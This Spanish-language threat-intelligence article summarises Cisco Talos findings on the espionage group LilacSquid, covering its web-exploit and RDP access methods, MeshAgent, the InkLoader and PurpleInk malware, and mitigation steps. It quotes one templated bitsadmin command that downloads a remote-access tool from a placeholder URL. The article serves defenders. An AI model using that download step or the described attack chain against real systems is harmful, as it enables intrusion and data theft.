Un nuevo informe de Cisco Talos expuso las actividades de un actor de amenazas conocido como LilacSquid, o UAT-4820. El actor de amenazas explota aplicaciones web vulnerables o utiliza credenciales comprometidas de Protección de Escritorio Remoto para comprometer exitosamente sistemas al infectarlos con malware personalizado PurpleInk. Hasta ahora, organizaciones en varios sectores en los EE. UU., Europa y Asia han sido impactadas con el propósito de robo de datos, aunque es posible que más sectores hayan sido afectados pero aún no han sido identificados.
¿Quién es LilacSquid?
LilacSquid es un actor de amenazas de ciberespionaje que ha estado activo desde al menos 2021. También es conocido como UAT-4820.
Algunas de las industrias que LilacSquid ha atacado hasta ahora incluyen:
Organizaciones de TI que construyen software para los sectores de investigación e industrial en los EE. UU.
Organizaciones en el sector energético en Europa.
Organizaciones en el sector farmacéutico en Asia.
Varias tácticas, técnicas y procedimientos utilizados por el actor de amenazas son similares a los de los grupos de amenazas persistentes avanzadas de Corea del Norte, específicamente Andariel y su estructura paraguas matriz, Lazarus. Entre esas TTPs, el uso del software MeshAgent para mantener el acceso después de la comprometida inicial, así como el uso extensivo de herramientas de proxy y túneles, hace posible que LilacSquid pueda estar vinculado a Lazarus y compartir herramientas, infraestructura u otros recursos.
Métodos de acceso inicial de LilacSquid en los objetivos
Primer método: Explotación de aplicaciones web vulnerables
El primer método utilizado por LilacSquid para comprometer sus objetivos consiste en explotar con éxito aplicaciones web vulnerables.
Una vez que se realiza la explotación, el actor de amenazas implementa scripts para configurar carpetas de trabajo para el malware, luego descarga y ejecuta MeshAgent, una herramienta de gestión remota de código abierto. La descarga se realiza típicamente a través de la herramienta legítima bitsadmin del sistema operativo Microsoft Windows:
bitsadmin /transfer -job_name- /download /priority normal -remote_URL- -local_path_for_MeshAgent- -local_path_for_MeshAgent- connect
MeshAgent utiliza un archivo de configuración de texto conocido como archivo MSH, que contiene un identificador de víctima y la dirección del Command & Control.
La herramienta permite a su operador listar todos los dispositivos de su objetivo, ver y controlar el escritorio, gestionar archivos en el sistema controlado o recopilar información de software y hardware del dispositivo.
Una vez instalado y en funcionamiento, MeshAgent se utiliza para activar otras herramientas como Secure Socket Funneling, una herramienta de código abierto para el enrutamiento y tunelización de comunicaciones, y los implantes de malware InkLoader/PurpleInk.
Segundo método: Uso de credenciales RDP comprometidas
Un segundo método utilizado por LilacSquid para acceder a los objetivos consiste en utilizar credenciales RDP comprometidas. Cuando se utiliza este método, LilacSquid elige entre desplegar MeshAgent y continuar con el ataque o introducir InkLoader, un cargador de malware simple pero efectivo.
InkLoader ejecuta otro carga útil: PurpleInk. El cargador solo se ha observado ejecutando PurpleInk, pero podría usarse para desplegar otros implantes de malware.
Otro cargador utilizado por LilacSquid es InkBox, que lee y descifra contenido desde una ruta de archivo codificada en el disco. El contenido descifrado es ejecutado invocando su Punto de Entrada dentro del proceso de InkBox que se ejecuta en la computadora. Este contenido descifrado es el malware PurpleInk.
¿Qué es el malware PurpleInk?
El principal implante utilizado por el actor de amenazas LilacSquid, PurpleInk, se basa en QuasarRAT, una herramienta de acceso remoto disponible en línea desde al menos 2014. PurpleInk ha sido desarrollado a partir de la base de QuasarRAT en 2021 y continúa actualizándose. Está fuertemente ofuscado, en un intento de hacer que su detección sea más difícil.
El malware utiliza un archivo de configuración codificado en base64 que contiene la dirección IP y el número de puerto del servidor C2.
PurpleInk es capaz de recopilar información básica como información de la unidad (por ejemplo, etiquetas de volumen, nombres de directorios raíz, tipo y formato de unidad), información de procesos en ejecución o información del sistema (por ejemplo, tamaño de memoria, nombre de usuario, nombre de computadora, direcciones IP, tiempo de actividad de la computadora). El malware también es capaz de enumerar carpetas, nombres y tamaños de archivos y reemplazar o añadir contenido a archivos. Y, PurpleInk es capaz de iniciar un shell remoto y enviar/recibir datos desde una dirección remota especificada, generalmente un servidor proxy.
¿Cómo mitigar este riesgo de ciberseguridad de LilacSquid?
Para proteger a su organización contra las operaciones de compromiso inicial llevadas a cabo por LilacSquid, es necesario:
Mantener todas las aplicaciones web expuestas a Internet actualizadas y parcheadas. Además, todo el hardware, sistemas operativos y software deben estar actualizados y parcheados para evitar ser comprometidos por otras vulnerabilidades comunes.
Aplicar políticas estrictas a las conexiones RDP de los empleados y desplegar autenticación multifactor cuando sea posible para evitar que un atacante pueda iniciar sesión en la red corporativa a través de RDP.
Buscar archivos de configuración de MeshAgent en sistemas, especialmente si la herramienta no se utiliza internamente.
Analizar cuidadosamente cualquier uso de la herramienta bitsadmin para descargar o ejecutar código.
Monitorear las comunicaciones de red en busca de conexiones en puertos exóticos o comunicaciones que vayan directamente a direcciones IP externas en lugar de dominios.
Desplegar soluciones de detección en los puntos finales: detección y respuesta en los puntos finales o detección y respuesta extendida para detectar actividades sospechosas.
Elevar la conciencia de los empleados sobre las amenazas cibernéticas, especialmente cómo detectar y reportar intentos de phishing.
Divulgación: Trabajo para Trend Micro, pero las opiniones expresadas en este artículo son mías.